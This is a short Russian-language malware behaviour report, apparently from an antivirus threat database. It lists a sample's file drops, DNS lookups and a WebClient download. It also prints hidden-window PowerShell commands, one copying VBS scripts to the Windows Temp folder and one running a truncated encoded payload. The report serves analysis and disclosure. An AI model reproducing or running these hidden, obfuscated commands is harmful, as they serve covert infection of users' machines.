Техническая информация
Вредоносные функции
Загружает
- (new-object net.webclient
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\debug.vbs
Сетевая активность
UDP
- DNS ASK microsoft.com
- DNS ASK pa###bin.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Copy-Item -Path *.vbs -Destination %WINDIR%\Temp\Debug.vbs' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $iUqm = 'JABSAG8AZABhAEMAbwBwAYHQDykAIAA9ACAAJwBBAEwARABlACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AYHQDyMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAYHQDyMAZQA...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Copy-Item -Path *.vbs -Destination %WINDIR%\Temp\Debug.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $iUqm = 'JABSAG8AZABhAEMAbwBwAYHQDykAIAA9ACAAJwBBAEwARABlACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AYHQDyMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAYHQDyMAZQA...
